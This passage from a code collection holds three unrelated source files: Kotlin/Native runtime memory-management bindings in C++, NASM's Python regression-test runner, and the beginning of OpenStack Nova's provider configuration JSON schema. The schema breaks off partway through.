ObjHeader** location, ObjHeader* newValue, int32_t* spinlock, int32_t* cookie) {
mm::SetHeapRefAtomic(location, newValue);
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW OBJ_GETTER(ReadHeapRefLocked, ObjHeader** location, int32_t* spinlock, int32_t* cookie) {
RETURN_RESULT_OF(mm::ReadHeapRefAtomic, location);
}
extern "C" OBJ_GETTER(ReadHeapRefNoLock, ObjHeader* object, int32_t index) {
// TODO: Remove when legacy MM is gone.
ThrowNotImplementedError();
}
extern "C" RUNTIME_NOTHROW void EnterFrame(ObjHeader** start, int parameters, int count) {
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
AssertThreadState(threadData, ThreadState::kRunnable);
threadData->shadowStack().EnterFrame(start, parameters, count);
}
extern "C" RUNTIME_NOTHROW void LeaveFrame(ObjHeader** start, int parameters, int count) {
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
AssertThreadState(threadData, ThreadState::kRunnable);
threadData->shadowStack().LeaveFrame(start, parameters, count);
}
extern "C" RUNTIME_NOTHROW void AddTLSRecord(MemoryState* memory, void** key, int size) {
memory->GetThreadData()->tls().AddRecord(key, size);
}
extern "C" RUNTIME_NOTHROW void CommitTLSStorage(MemoryState* memory) {
memory->GetThreadData()->tls().Commit();
}
extern "C" RUNTIME_NOTHROW void ClearTLS(MemoryState* memory) {
memory->GetThreadData()->tls().Clear();
}
extern "C" RUNTIME_NOTHROW ObjHeader** LookupTLS(void** key, int index) {
return mm::ThreadRegistry::Instance().CurrentThreadData()->tls().Lookup(key, index);
}
extern "C" RUNTIME_NOTHROW void GC_RegisterWorker(void* worker) {
// TODO: Remove when legacy MM is gone.
// Nothing to do
}
extern "C" RUNTIME_NOTHROW void GC_UnregisterWorker(void* worker) {
// TODO: Remove when legacy MM is gone.
// Nothing to do
}
extern "C" RUNTIME_NOTHROW void GC_CollectorCallback(void* worker) {
// TODO: Remove when legacy MM is gone.
// Nothing to do
}
extern "C" void Kotlin_native_internal_GC_collect(ObjHeader*) {
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
threadData->gc().PerformFullGC();
}
extern "C" void Kotlin_native_internal_GC_collectCyclic(ObjHeader*) {
// TODO: Remove when legacy MM is gone.
ThrowIllegalArgumentException();
}
// TODO: Maybe a pair of suspend/resume or start/stop may be useful in the future?
// The other pair is likely to be removed.
extern "C" void Kotlin_native_internal_GC_suspend(ObjHeader*) {
// Nothing to do
}
extern "C" void Kotlin_native_internal_GC_resume(ObjHeader*) {
// Nothing to do
}
extern "C" void Kotlin_native_internal_GC_stop(ObjHeader*) {
// Nothing to do
}
extern "C" void Kotlin_native_internal_GC_start(ObjHeader*) {
// Nothing to do
}
// Kotlin-visible setter for the GC scheduler's `threshold` config value;
// negative values are rejected with IllegalArgumentException.
extern "C" void Kotlin_native_internal_GC_setThreshold(ObjHeader*, int32_t value) {
    if (value < 0) {
        ThrowIllegalArgumentException();
    }
    mm::GlobalData::Instance().gcScheduler().config().threshold = static_cast<size_t>(value);
}
// Kotlin-visible getter for the GC scheduler's `threshold` config value,
// clamped to the int32_t range the Kotlin API exposes.
extern "C" int32_t Kotlin_native_internal_GC_getThreshold(ObjHeader*) {
    auto threshold = mm::GlobalData::Instance().gcScheduler().config().threshold.load();
    auto maxValue = std::numeric_limits<int32_t>::max();
    if (threshold > static_cast<size_t>(maxValue)) {
        return maxValue;
    }
    // BUG FIX: previously returned maxValue unconditionally; return the
    // actual configured threshold instead (mirrors the setter above).
    return static_cast<int32_t>(threshold);
}
extern "C" void Kotlin_native_internal_GC_setCollectCyclesThreshold(ObjHeader*, int64_t value) {
// TODO: Remove when legacy MM is gone.
ThrowIllegalArgumentException();
}
extern "C" int64_t Kotlin_native_internal_GC_getCollectCyclesThreshold(ObjHeader*) {
// TODO: Remove when legacy MM is gone.
ThrowIllegalArgumentException();
}
// Kotlin-visible setter for the scheduler's allocation threshold
// (`allocationThresholdBytes`); negative values are rejected.
extern "C" void Kotlin_native_internal_GC_setThresholdAllocations(ObjHeader*, int64_t value) {
    if (value < 0) {
        ThrowIllegalArgumentException();
    }
    mm::GlobalData::Instance().gcScheduler().config().allocationThresholdBytes = static_cast<size_t>(value);
}
// Kotlin-visible getter for the scheduler's allocation threshold
// (`allocationThresholdBytes`), clamped to the int64_t range of the API.
extern "C" int64_t Kotlin_native_internal_GC_getThresholdAllocations(ObjHeader*) {
    auto threshold = mm::GlobalData::Instance().gcScheduler().config().allocationThresholdBytes.load();
    auto maxValue = std::numeric_limits<int64_t>::max();
    if (threshold > static_cast<size_t>(maxValue)) {
        return maxValue;
    }
    // BUG FIX: previously returned maxValue unconditionally instead of the
    // stored threshold.
    return static_cast<int64_t>(threshold);
}
extern "C" void Kotlin_native_internal_GC_setTuneThreshold(ObjHeader*, KBoolean value) {
mm::GlobalData::Instance().gcScheduler().config().autoTune = value;
}
extern "C" KBoolean Kotlin_native_internal_GC_getTuneThreshold(ObjHeader*) {
return mm::GlobalData::Instance().gcScheduler().config().autoTune.load();
}
extern "C" OBJ_GETTER(Kotlin_native_internal_GC_detectCycles, ObjHeader*) {
// TODO: Remove when legacy MM is gone.
RETURN_OBJ(nullptr);
}
extern "C" OBJ_GETTER(Kotlin_native_internal_GC_findCycle, ObjHeader*, ObjHeader* root) {
// TODO: Remove when legacy MM is gone.
RETURN_OBJ(nullptr);
}
extern "C" bool Kotlin_native_internal_GC_getCyclicCollector(ObjHeader* gc) {
// TODO: Remove when legacy MM is gone.
return false;
}
extern "C" void Kotlin_native_internal_GC_setCyclicCollector(ObjHeader* gc, bool value) {
// TODO: Remove when legacy MM is gone.
if (value)
ThrowIllegalArgumentException();
}
extern "C" bool Kotlin_Any_isShareable(ObjHeader* thiz) {
// TODO: Remove when legacy MM is gone.
return true;
}
extern "C" void Kotlin_Any_share(ObjHeader* thiz) {
// TODO: Remove when legacy MM is gone.
// Nothing to do
}
extern "C" RUNTIME_NOTHROW void PerformFullGC(MemoryState* memory) {
memory->GetThreadData()->gc().PerformFullGC();
}
extern "C" bool TryAddHeapRef(const ObjHeader* object) {
RuntimeFail("Only for legacy MM");
}
extern "C" RUNTIME_NOTHROW void ReleaseHeapRefNoCollect(const ObjHeader* object) {
RuntimeFail("Only for legacy MM");
}
extern "C" RUNTIME_NOTHROW OBJ_GETTER(TryRef, ObjHeader* object) {
// TODO: With CMS this needs:
// * during marking phase if `object` is unmarked: barrier (might be automatic because of the stack write)
// and return `object`;
// * during marking phase if `object` is marked: return `object`;
// * during sweeping phase if `object` is unmarked: return nullptr;
// * during sweeping phase if `object` is marked: return `object`;
RETURN_OBJ(object);
}
extern "C" RUNTIME_NOTHROW bool ClearSubgraphReferences(ObjHeader* root, bool checked) {
// TODO: Remove when legacy MM is gone.
return true;
}
// Registers `object` as a stable (GC-rooted) reference; null maps to null.
extern "C" RUNTIME_NOTHROW void* CreateStablePointer(ObjHeader* object) {
    if (!object)
        return nullptr;
    auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
    return mm::StableRefRegistry::Instance().RegisterStableRef(threadData, object);
}

// Releases a stable reference on behalf of the current thread.
extern "C" RUNTIME_NOTHROW void DisposeStablePointer(void* pointer) {
    DisposeStablePointerFor(kotlin::mm::GetMemoryState(), pointer);
}

// Releases a stable reference on behalf of the thread owning `memoryState`.
extern "C" RUNTIME_NOTHROW void DisposeStablePointerFor(MemoryState* memoryState, void* pointer) {
    if (!pointer)
        return;
    auto* node = static_cast<mm::StableRefRegistry::Node*>(pointer);
    mm::StableRefRegistry::Instance().UnregisterStableRef(memoryState->GetThreadData(), node);
}

// Reads the object behind a stable reference without releasing it.
extern "C" RUNTIME_NOTHROW OBJ_GETTER(DerefStablePointer, void* pointer) {
    if (!pointer)
        RETURN_OBJ(nullptr);
    auto* node = static_cast<mm::StableRefRegistry::Node*>(pointer);
    ObjHeader* object = **node;
    RETURN_OBJ(object);
}
// Dereferences a stable pointer and releases it in one step, returning the
// adopted object through the result slot. The ordering below is critical.
extern "C" RUNTIME_NOTHROW OBJ_GETTER(AdoptStablePointer, void* pointer) {
    if (!pointer)
        RETURN_OBJ(nullptr);
    auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
    auto* node = static_cast<mm::StableRefRegistry::Node*>(pointer);
    ObjHeader* object = **node;
    // Make sure `object` stays in the rootset: put it on the stack before removing it from `StableRefRegistry`.
    mm::SetStackRef(OBJ_RESULT, object);
    mm::StableRefRegistry::Instance().UnregisterStableRef(threadData, node);
    return object;
}
extern "C" void MutationCheck(ObjHeader* obj) {
if (obj->local()) return;
if (!isPermanentOrFrozen(obj)) return;
ThrowInvalidMutabilityException(obj);
}
// Compiler-inserted check that a stack-allocated object is never stored into
// a heap object; if it fires, the generated code is wrong, so abort loudly.
extern "C" RUNTIME_NOTHROW void CheckLifetimesConstraint(ObjHeader* obj, ObjHeader* pointee) {
    // TODO: Consider making it a `RuntimeCheck`. Probably all `RuntimeCheck`s and `RuntimeAssert`s should specify
    // that their firing is a compiler bug and should be reported.
    if (!obj->local() && pointee != nullptr && pointee->local()) {
        konan::consolePrintf("Attempt to store a stack object %p into a heap object %p\n", pointee, obj);
        konan::consolePrintf("This is a compiler bug, please report it to https://kotl.in/issue\n");
        konan::abort();
    }
}
extern "C" void FreezeSubgraph(ObjHeader* obj) {
if (auto* blocker = mm::FreezeSubgraph(obj)) {
ThrowFreezingException(obj, blocker);
}
}
extern "C" void EnsureNeverFrozen(ObjHeader* obj) {
if (!mm::EnsureNeverFrozen(obj)) {
ThrowFreezingException(obj, obj);
}
}
extern "C" ForeignRefContext InitLocalForeignRef(ObjHeader* object) {
AssertThreadState(ThreadState::kRunnable);
// TODO: Remove when legacy MM is gone.
// Nothing to do.
return nullptr;
}
extern "C" ForeignRefContext InitForeignRef(ObjHeader* object) {
AssertThreadState(ThreadState::kRunnable);
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
auto* node = mm::StableRefRegistry::Instance().RegisterStableRef(threadData, object);
return ToForeignRefManager(node);
}
extern "C" void DeinitForeignRef(ObjHeader* object, ForeignRefContext context) {
AssertThreadState(ThreadState::kRunnable);
RuntimeAssert(context != nullptr, "DeinitForeignRef must not be called for InitLocalForeignRef");
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
auto* node = FromForeignRefManager(context);
RuntimeAssert(object == **node, "Must correspond to the same object");
mm::StableRefRegistry::Instance().UnregisterStableRef(threadData, node);
}
extern "C" bool IsForeignRefAccessible(ObjHeader* object, ForeignRefContext context) {
// TODO: Remove when legacy MM is gone.
return true;
}
extern "C" void AdoptReferenceFromSharedVariable(ObjHeader* object) {
// TODO: Remove when legacy MM is gone.
// Nothing to do.
}
extern "C" void CheckGlobalsAccessible() {
// TODO: Remove when legacy MM is gone.
// Always accessible
}
// Safe-point hooks injected by the compiler: each asserts the thread is
// runnable and gives the GC a chance to act at function epilogues, loop
// back-edges and exception unwinds respectively.
extern "C" RUNTIME_NOTHROW ALWAYS_INLINE void Kotlin_mm_safePointFunctionEpilogue() {
    auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
    AssertThreadState(threadData, ThreadState::kRunnable);
    threadData->gc().SafePointFunctionEpilogue();
}

extern "C" RUNTIME_NOTHROW ALWAYS_INLINE void Kotlin_mm_safePointWhileLoopBody() {
    auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
    AssertThreadState(threadData, ThreadState::kRunnable);
    threadData->gc().SafePointLoopBody();
}

extern "C" RUNTIME_NOTHROW ALWAYS_INLINE void Kotlin_mm_safePointExceptionUnwind() {
    auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
    AssertThreadState(threadData, ThreadState::kRunnable);
    threadData->gc().SafePointExceptionUnwind();
}

// Thread-state switch helpers used around calls into native code.
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void Kotlin_mm_switchThreadStateNative() {
    SwitchThreadState(mm::ThreadRegistry::Instance().CurrentThreadData(), ThreadState::kNative);
}

extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void Kotlin_mm_switchThreadStateRunnable() {
    SwitchThreadState(mm::ThreadRegistry::Instance().CurrentThreadData(), ThreadState::kRunnable);
}
MemoryState* kotlin::mm::GetMemoryState() noexcept {
return ToMemoryState(ThreadRegistry::Instance().CurrentThreadDataNode());
}
bool kotlin::mm::IsCurrentThreadRegistered() noexcept {
return ThreadRegistry::Instance().IsCurrentThreadRegistered();
}
ALWAYS_INLINE kotlin::CalledFromNativeGuard::CalledFromNativeGuard(bool reentrant) noexcept : reentrant_(reentrant) {
Kotlin_initRuntimeIfNeeded();
thread_ = mm::GetMemoryState();
oldState_ = SwitchThreadState(thread_, ThreadState::kRunnable, reentrant_);
}
const bool kotlin::kSupportsMultipleMutators = kotlin::gc::kSupportsMultipleMutators;
| 7,104 |
2,219 | <filename>src/third_party/nasm/travis/nasm-t.py
#!/usr/bin/python3
import subprocess
import argparse
import difflib
import filecmp
import fnmatch
import json
import sys
import re
import os
# Command-line interface: global options plus 'run', 'list' and 'update'
# sub-commands.
fmtr_class = argparse.ArgumentDefaultsHelpFormatter
parser = argparse.ArgumentParser(prog = 'nasm-t.py',
                                 formatter_class=fmtr_class)
parser.add_argument('-d', '--directory',
                    dest = 'dir', default = './travis/test',
                    help = 'Directory with tests')
parser.add_argument('--nasm',
                    dest = 'nasm', default = './nasm',
                    help = 'Nasm executable to use')
parser.add_argument('--hexdump',
                    dest = 'hexdump', default = '/usr/bin/hexdump',
                    help = 'Hexdump executable to use')
sp = parser.add_subparsers(dest = 'cmd')
# 'run' executes tests (optionally a single one selected with -t).
for cmd in ['run']:
    spp = sp.add_parser(cmd, help = 'Run test cases')
    spp.add_argument('-t', '--test',
                     dest = 'test',
                     help = 'Run the selected test only',
                     required = False)
# 'list' only enumerates the discovered tests.
for cmd in ['list']:
    spp = sp.add_parser(cmd, help = 'List test cases')
# 'update' re-runs the compiler and refreshes the reference outputs.
for cmd in ['update']:
    spp = sp.add_parser(cmd, help = 'Update test cases with new compiler')
    spp.add_argument('-t', '--test',
                     dest = 'test',
                     help = 'Update the selected test only',
                     required = False)
args = parser.parse_args()
# A sub-command is mandatory; bail out with usage otherwise.
if args.cmd == None:
    parser.print_help()
    sys.exit(1)
def read_stdfile(path):
    """Return the contents of *path* decoded as UTF-8, minus surrounding newlines."""
    with open(path, "rb") as raw:
        payload = raw.read()
    return payload.decode("utf-8").strip("\n")
#
# Check if descriptor has mandatory fields
def is_valid_desc(desc):
    """A descriptor is usable only when it exists and carries a non-empty description."""
    if desc is None:
        return False
    if desc.get('description', "") == "":
        return False
    return True
#
# Expand ref/id in descriptors array
def expand_templates(desc_array):
    """Resolve 'ref' entries in place.

    An entry referencing a template (an entry carrying 'id') is replaced by a
    copy of that template overridden by the entry's own keys; the inherited
    'id' is dropped so the result is not itself a template.
    """
    templates = {}
    for entry in desc_array:
        if 'id' in entry:
            templates[entry['id']] = entry
    for pos, entry in enumerate(desc_array):
        if 'ref' in entry and entry['ref'] in templates:
            merged = dict(templates[entry['ref']])
            merged.update(entry)
            del merged['id']
            desc_array[pos] = merged
    return desc_array
def prepare_desc(desc, basedir, name, path):
    """Normalize a test descriptor in place; returns False for unusable ones."""
    if not is_valid_desc(desc):
        return False
    # Private bookkeeping fields (leading underscore = internal).
    desc['_base-dir'] = basedir
    desc['_json-file'] = name
    desc['_json-path'] = path
    desc['_test-name'] = basedir + os.sep + name[:-5]
    # A descriptor without targets can never be updated.
    if 'target' not in desc:
        desc['target'] = []
        desc['update'] = 'false'
    # Exit code nasm is expected to produce (1 for expected-error tests).
    desc['_wait'] = 1 if desc.get('error') == 'expected' else 0
    # Derive default match templates for outputs that lack one.
    for tgt in desc['target']:
        if 'output' in tgt and 'match' not in tgt:
            tgt['match'] = tgt['output'] + ".t"
    return True
def read_json(path):
    """Parse *path* as JSON; return the decoded object or None on failure.

    Only OSError and ValueError (json.JSONDecodeError and UnicodeDecodeError
    are subclasses of ValueError) are swallowed, so KeyboardInterrupt and
    SystemExit now propagate instead of being silently eaten by the previous
    bare ``except:`` clauses. The redundant nested try and ``f.close()``
    inside the ``with`` block are gone as well.
    """
    try:
        with open(path, "rb") as f:
            return json.loads(f.read().decode("utf-8").strip("\n"))
    except (OSError, ValueError):
        return None
def read_desc(basedir, name):
    """Load descriptor file *name* under *basedir*; always returns a list."""
    path = basedir + os.sep + name
    loaded = read_json(path)
    prepared = []
    if isinstance(loaded, dict):
        # A single descriptor document.
        if prepare_desc(loaded, basedir, name, path):
            prepared.append(loaded)
    elif isinstance(loaded, list):
        # A batch of descriptors, possibly with ref/id templates.
        expand_templates(loaded)
        for entry in loaded:
            if prepare_desc(entry, basedir, name, path):
                prepared.append(entry)
    return prepared
def collect_test_desc_from_file(path):
    """Read descriptors from one JSON file; '.json' is appended when missing."""
    if not fnmatch.fnmatch(path, '*.json'):
        path += '.json'
    return read_desc(os.path.dirname(path), os.path.basename(path))
def collect_test_desc_from_dir(basedir):
    """Recursively gather descriptors from every *.json under *basedir*, sorted by test name."""
    collected = []
    if os.path.isdir(basedir):
        for entry in os.listdir(basedir):
            full = basedir + os.sep + entry
            if os.path.isdir(full):
                collected += collect_test_desc_from_dir(full)
            elif fnmatch.fnmatch(entry, '*.json'):
                descs = read_desc(basedir, entry)
                if descs is None:
                    continue
                collected += descs
    collected.sort(key=lambda d: d['_test-name'])
    return collected
# 'list' sub-command: print a table of every discovered test with its
# description.
if args.cmd == 'list':
    fmt_entry = '%-32s %s'
    desc_array = collect_test_desc_from_dir(args.dir)
    print(fmt_entry % ('Name', 'Description'))
    for desc in desc_array:
        print(fmt_entry % (desc['_test-name'], desc['description']))
def test_abort(test, message):
print("\t%s: %s" % (test, message))
print("=== Test %s ABORT ===" % (test))
sys.exit(1)
return False
def test_fail(test, message):
print("\t%s: %s" % (test, message))
print("=== Test %s FAIL ===" % (test))
return False
def test_skip(test, message):
print("\t%s: %s" % (test, message))
print("=== Test %s SKIP ===" % (test))
return True
def test_over(test):
print("=== Test %s ERROR OVER ===" % (test))
return True
def test_pass(test):
print("=== Test %s PASS ===" % (test))
return True
def test_updated(test):
print("=== Test %s UPDATED ===" % (test))
return True
def run_hexdump(path):
    """Spawn `hexdump -C` on *path*; return the finished Popen on success, else None."""
    proc = subprocess.Popen([args.hexdump, "-C", path],
                            stdout = subprocess.PIPE,
                            close_fds = True)
    return proc if proc.wait() == 0 else None
def show_std(stdname, data):
    """Dump a captured stream, one tab-indented line at a time."""
    print(f"\t--- {stdname}")
    for line in data.split("\n"):
        print(f"\t{line}")
    print("\t---")
def cmp_std(from_name, from_data, match_name, match_data):
    """Compare two captured streams.

    On mismatch both streams plus a unified diff are printed and False is
    returned; identical streams yield True silently.
    """
    if from_data == match_data:
        return True
    print(f"\t--- {from_name}")
    for line in from_data.split("\n"):
        print(f"\t{line}")
    print(f"\t--- {match_name}")
    for line in match_data.split("\n"):
        print(f"\t{line}")
    diff = difflib.unified_diff(from_data.split("\n"), match_data.split("\n"),
                                fromfile = from_name, tofile = match_name)
    for line in diff:
        print("\t" + line.strip("\n"))
    print("\t---")
    return False
def show_diff(test, patha, pathb):
    """Hexdump both files and print the dumps plus their unified diff.

    Returns True after printing; returns test_fail's False when either
    hexdump could not be produced.
    """
    pa = run_hexdump(patha)
    pb = run_hexdump(pathb)
    if pa == None or pb == None:
        return test_fail(test, "Can't create dumps")
    sa = pa.stdout.read().decode("utf-8").strip("\n")
    sb = pb.stdout.read().decode("utf-8").strip("\n")
    print("\t--- hexdump %s" % (patha))
    for i in sa.split("\n"):
        print("\t%s" % i)
    print("\t--- hexdump %s" % (pathb))
    for i in sb.split("\n"):
        print("\t%s" % i)
    pa.stdout.close()
    pb.stdout.close()
    diff = difflib.unified_diff(sa.split("\n"), sb.split("\n"),
                                fromfile = patha, tofile = pathb)
    for i in diff:
        print("\t%s" % i.strip("\n"))
    print("\t---")
    return True
def prepare_run_opts(desc):
    """Build the nasm command-line argument list described by *desc*."""
    opts = []
    if 'format' in desc:
        opts += ['-f', desc['format']]
    if 'option' in desc:
        opts += desc['option'].split(" ")
    for tgt in desc['target']:
        if 'output' in tgt:
            out_path = desc['_base-dir'] + os.sep + tgt['output']
            if 'option' in tgt:
                opts += tgt['option'].split(" ") + [out_path]
            else:
                opts += ['-o', out_path]
        if 'stdout' in tgt or 'stderr' in tgt:
            if 'option' in tgt:
                opts += tgt['option'].split(" ")
    if 'source' in desc:
        opts += [desc['_base-dir'] + os.sep + desc['source']]
    return opts
def exec_nasm(desc):
    """Run nasm for one test descriptor.

    Returns a (Popen, stdout, stderr) triple; on any failure (spawn problem
    or unexpected exit status) returns (None, None, None) so callers can
    always unpack the result.
    """
    print("\tProcessing %s" % (desc['_test-name']))
    opts = [args.nasm] + prepare_run_opts(desc)

    nasm_env = os.environ.copy()
    nasm_env['NASM_TEST_RUN'] = 'y'
    desc_env = desc.get('environ')
    if desc_env:
        for i in desc_env:
            v = i.split('=')
            if len(v) == 2:
                nasm_env[v[0]] = v[1]
            else:
                # NOTE(review): Popen rejects None env values; this branch
                # probably meant to *remove* the variable -- confirm intent.
                nasm_env[v[0]] = None

    print("\tExecuting %s" % (" ".join(opts)))
    pnasm = subprocess.Popen(opts,
                             stdout = subprocess.PIPE,
                             stderr = subprocess.PIPE,
                             close_fds = True,
                             env = nasm_env)
    if pnasm == None:
        test_fail(desc['_test-name'], "Unable to execute test")
        # BUG FIX: callers unpack three values; the previous bare
        # `return None` raised TypeError instead of reporting the failure.
        return None, None, None

    stderr = pnasm.stderr.read(4194304).decode("utf-8").strip("\n")
    stdout = pnasm.stdout.read(4194304).decode("utf-8").strip("\n")

    pnasm.stdout.close()
    pnasm.stderr.close()

    wait_rc = pnasm.wait()

    if desc['_wait'] != wait_rc:
        if stdout != "":
            show_std("stdout", stdout)
        if stderr != "":
            show_std("stderr", stderr)
        test_fail(desc['_test-name'],
                  "Unexpected ret code: " + str(wait_rc))
        return None, None, None
    return pnasm, stdout, stderr
def test_run(desc):
    """Run one test: execute nasm and compare every declared target.

    Returns True when all outputs/streams match the references, False
    otherwise.
    """
    print("=== Running %s ===" % (desc['_test-name']))

    pnasm, stdout, stderr = exec_nasm(desc)
    if pnasm == None:
        return False

    for t in desc['target']:
        if 'output' in t:
            output = desc['_base-dir'] + os.sep + t['output']
            match = desc['_base-dir'] + os.sep + t['match']
            if desc['_wait'] == 1:
                # Expected-error tests produce no output file to compare.
                continue
            print("\tComparing %s %s" % (output, match))
            if filecmp.cmp(match, output) == False:
                show_diff(desc['_test-name'], match, output)
                return test_fail(desc['_test-name'], match + " and " + output + " files are different")
        elif 'stdout' in t:
            print("\tComparing stdout")
            match = desc['_base-dir'] + os.sep + t['stdout']
            match_data = read_stdfile(match)
            if match_data == None:
                # BUG FIX: this branch referenced an undefined name `test`,
                # so it raised NameError instead of reporting the failure.
                return test_fail(desc['_test-name'], "Can't read " + match)
            if cmp_std(match, match_data, 'stdout', stdout) == False:
                return test_fail(desc['_test-name'], "Stdout mismatch")
            else:
                stdout = ""
        elif 'stderr' in t:
            print("\tComparing stderr")
            match = desc['_base-dir'] + os.sep + t['stderr']
            match_data = read_stdfile(match)
            if match_data == None:
                # BUG FIX: same undefined-name problem as the stdout branch.
                return test_fail(desc['_test-name'], "Can't read " + match)
            if cmp_std(match, match_data, 'stderr', stderr) == False:
                return test_fail(desc['_test-name'], "Stderr mismatch")
            else:
                stderr = ""

    # Anything left in the captured streams was not accounted for by targets.
    if stdout != "":
        show_std("stdout", stdout)
        return test_fail(desc['_test-name'], "Stdout is not empty")

    if stderr != "":
        show_std("stderr", stderr)
        return test_fail(desc['_test-name'], "Stderr is not empty")

    return test_pass(desc['_test-name'])
#
# Re-run the compiler and capture its outputs as the new reference targets.
def test_update(desc):
    """Refresh the reference outputs for one test descriptor."""
    print(f"=== Updating {desc['_test-name']} ===")

    if desc.get('update') == 'false':
        return test_skip(desc['_test-name'], "No output provided")

    pnasm, stdout, stderr = exec_nasm(desc)
    if pnasm is None:
        return False

    for tgt in desc['target']:
        if 'output' in tgt:
            produced = desc['_base-dir'] + os.sep + tgt['output']
            reference = desc['_base-dir'] + os.sep + tgt['match']
            print(f"\tMoving {produced} to {reference}")
            os.rename(produced, reference)
        if 'stdout' in tgt:
            reference = desc['_base-dir'] + os.sep + tgt['stdout']
            print(f"\tMoving stdout to {reference}")
            with open(reference, "wb") as f:
                f.write(stdout.encode("utf-8"))
        if 'stderr' in tgt:
            reference = desc['_base-dir'] + os.sep + tgt['stderr']
            print(f"\tMoving stderr to {reference}")
            with open(reference, "wb") as f:
                f.write(stderr.encode("utf-8"))

    return test_updated(desc['_test-name'])
# 'run' sub-command: execute either a single test (-t) or every test found
# under the test directory, aborting on the first unexpected failure.
if args.cmd == 'run':
    desc_array = []
    if args.test == None:
        desc_array = collect_test_desc_from_dir(args.dir)
    else:
        desc_array = collect_test_desc_from_file(args.test)
    if len(desc_array) == 0:
        test_abort(args.test, "Can't obtain test descriptors")

    for desc in desc_array:
        if test_run(desc) == False:
            # 'error': 'over' marks failures that should not stop the run.
            if 'error' in desc and desc['error'] == 'over':
                test_over(desc['_test-name'])
            else:
                test_abort(desc['_test-name'], "Error detected")
# 'update' sub-command: regenerate reference outputs for the selected tests,
# aborting on the first unexpected failure.
if args.cmd == 'update':
    desc_array = []
    if args.test == None:
        desc_array = collect_test_desc_from_dir(args.dir)
    else:
        desc_array = collect_test_desc_from_file(args.test)
    if len(desc_array) == 0:
        # BUG FIX: message read "a test descriptors"; now matches the
        # grammar of the 'run' branch above.
        test_abort(args.test, "Can't obtain test descriptors")

    for desc in desc_array:
        if test_update(desc) == False:
            # 'error': 'over' marks failures that should not stop the run.
            if 'error' in desc and desc['error'] == 'over':
                test_over(desc['_test-name'])
            else:
                test_abort(desc['_test-name'], "Error detected")
| 6,740 |
1,874 | <filename>nova/compute/provider_config.py
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import glob
import jsonschema
import logging
import microversion_parse
import os
import yaml
import os_resource_classes
import os_traits
from nova import exception as nova_exc
from nova.i18n import _
LOG = logging.getLogger(__name__)
# A dictionary keyed by every supported major version, whose value is the
# set of minor versions supported within that major version.
SUPPORTED_SCHEMA_VERSIONS = {
    1: {0}
}
# Supported provider config file schema
SCHEMA_V1 = {
    # This definition uses JSON Schema Draft 7.
    # https://json-schema.org/draft-07/json-schema-release-notes.html
    'type': 'object',
    'properties': {
        # This property is used to track where the provider.yaml file
        # originated. It is reserved for internal use and should never be
        # set in a provider.yaml file supplied by an end user.
        '__source_file': {'not': {}},
        'meta': {
            'type': 'object',
            'properties': {
                # Version ($Major, $minor) of the schema must successfully
                # parse documents conforming to ($Major, 0..N).
                # Any breaking schema change (e.g. removing fields, adding
                # new required fields, imposing a stricter pattern on a value,
                # etc.) must bump $Major.
                'schema_version': {
                    'type': 'string',
                    'pattern': '^1.([0-9]|[1-9][0-9]+)$'
                }
            },
            'required': ['schema_version'],
            'additionalProperties': True
        },
        'providers': {
            'type': 'array',
            'items': {
                'type': 'object',
                'properties': {
                    'identification': {
                        '$ref': '#/$defs/providerIdentification'
                    },
                    'inventories': {
                        '$ref': '#/$defs/providerInventories'
                    },
                    'traits': {
                        '$ref': '#/$defs/providerTraits'
                    }
                },
                'required': ['identification'],
                'additionalProperties': True
            }
        }
    },
    'required': ['meta'],
    'additionalProperties': True,
    '$defs': {
        'providerIdentification': {
            # Identify a single provider to configure.
            # Exactly one identification method should be used. Currently
            # `uuid` or `name` are supported, but future versions may
            # support others. The uuid can be set to the sentinel value
            # `$COMPUTE_NODE` which will cause the consuming compute service to
            # apply the configuration to all compute node root providers
            # it manages that are not otherwise specified using a uuid or name.
            'type': 'object',
            'properties': {
                'uuid': {
                    'oneOf': [
                        {
                            # TODO(sean-k-mooney): replace this with type uuid
                            # when we can depend on a version of the jsonschema
                            # lib that implements draft 8 or later of the
                            # jsonschema spec.
                            'type': 'string',
                            'pattern':
                                '^[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-'
                                '[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-'
                                '[0-9A-Fa-f]{12}$'
                        },
                        {
                            'type': 'string',
                            'const': '$COMPUTE_NODE'
                        }
                    ]
                },
                'name': {
                    'type': 'string',
                    'minLength': 1,
                    'maxLength': 200
                }
            },
            # This introduces the possibility of an unsupported key name being
            # used to get by schema validation, but is necessary to support
            # forward compatibility with new identification methods.
            # This should be checked after schema validation.
            'minProperties': 1,
            'maxProperties': 1,
            'additionalProperties': False
        },
        'providerInventories': {
            # Allows the admin to specify various adjectives to create and
            # manage providers' inventories. This list of adjectives can be
            # extended in the future as the schema evolves to meet new use
            # cases. As of v1.0, only one adjective, `additional`, is
            # supported.
            'type': 'object',
            'properties': {
                'additional': {
                    'type': 'array',
                    'items': {
                        'patternProperties': {
                            # Allows any key name matching the resource class
                            # pattern; a check to prevent conflicts with virt
                            # driver owned resource classes will be done after
                            # schema validation.
                            '^[A-Z0-9_]{1,255}$': {
                                'type': 'object',
                                'properties': {
                                    # Any optional properties not populated
                                    # will be given a default value by
                                    # placement. If overriding a pre-existing
                                    # provider values will not be preserved
                                    # from the existing inventory.
                                    'total': {
                                        'type': 'integer'
                                    },
                                    'reserved': {
                                        'type': 'integer'
                                    },
                                    'min_unit': {
                                        'type': 'integer'
                                    },
                                    'max_unit': {
